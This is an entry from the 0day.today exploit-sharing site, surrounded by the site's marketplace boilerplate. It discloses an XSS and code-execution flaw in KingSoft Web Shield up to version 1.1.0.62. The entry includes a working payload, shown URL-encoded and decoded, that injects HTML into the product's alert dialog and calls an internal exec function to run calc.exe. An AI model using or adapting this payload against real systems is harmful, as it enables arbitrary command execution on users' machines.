0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability
================================================================ KingSoft Web Shield <= 1.1.0.62 XSS/Code Execution Vulnerability ================================================================ # # KingSoft Web Shield XSS and Remote Code Execution Vulnerability # # Found by inking # # Version <= 1.1.0.62 # # Background: KingSoft Web Shield is a popular anti-malwebsites production of KingSoft Inc. around China. # # Details: When the KSWebShield detects a malwebsite, it sends the evil url from the web browser # to the KSWebShield service, and popup a dialog which alerts that a malwebsite has been detected. # Because it's unreliable filter method, the attacker can insert any HTML tag in the alert dialog. # when the evil codes are successfully inserted, we can use javascript to call it's inner functions # of the KSWebShield and execute any system commands. # # The evil url maybe like this hxxp://evil.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e # When decoded by the KSWebShield, the url maybe like this hxxp://evil.com/index.php?html=<p style="background:url(javascript:parent.CallCFunc('exec','c:\\windows\\system32\\calc.exe' ))">test</p> # Just make a website with evil javascript codes, and browse the url shows above # 0day.today [2024-12-24] #